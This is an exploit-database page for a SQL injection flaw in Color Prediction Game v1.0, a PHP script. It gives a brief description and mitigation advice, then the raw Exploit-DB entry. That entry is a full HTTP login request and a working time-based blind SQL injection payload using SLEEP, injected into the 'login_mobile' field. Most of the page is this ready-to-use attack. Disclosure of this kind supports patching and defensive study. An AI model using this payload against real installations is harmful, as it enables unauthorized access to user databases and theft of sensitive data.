Color Prediction Game v1.0 - SQL Injection

vendor:

Color Prediction Game v1.0

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Color Prediction Game v1.0

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux & MacOS

2023

Color Prediction Game v1.0 – SQL Injection

The Color Prediction Game v1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'login_mobile' parameter. This allows the attacker to manipulate the database and potentially retrieve sensitive information.

Mitigation:

To mitigate this vulnerability, proper input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Color Prediction Game v1.0 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###

POST /loginNow.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------395879129218961020344050490865
Content-Length: 434
Origin: http://localhost
Referer: http://localhost/login.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--

### Parameter & Payloads ###
Parameter: MULTIPART login_mobile ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_mobile"
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="login_password"
123456
-----------------------------395879129218961020344050490865
Content-Disposition: form-data; name="action"
login
-----------------------------395879129218961020344050490865--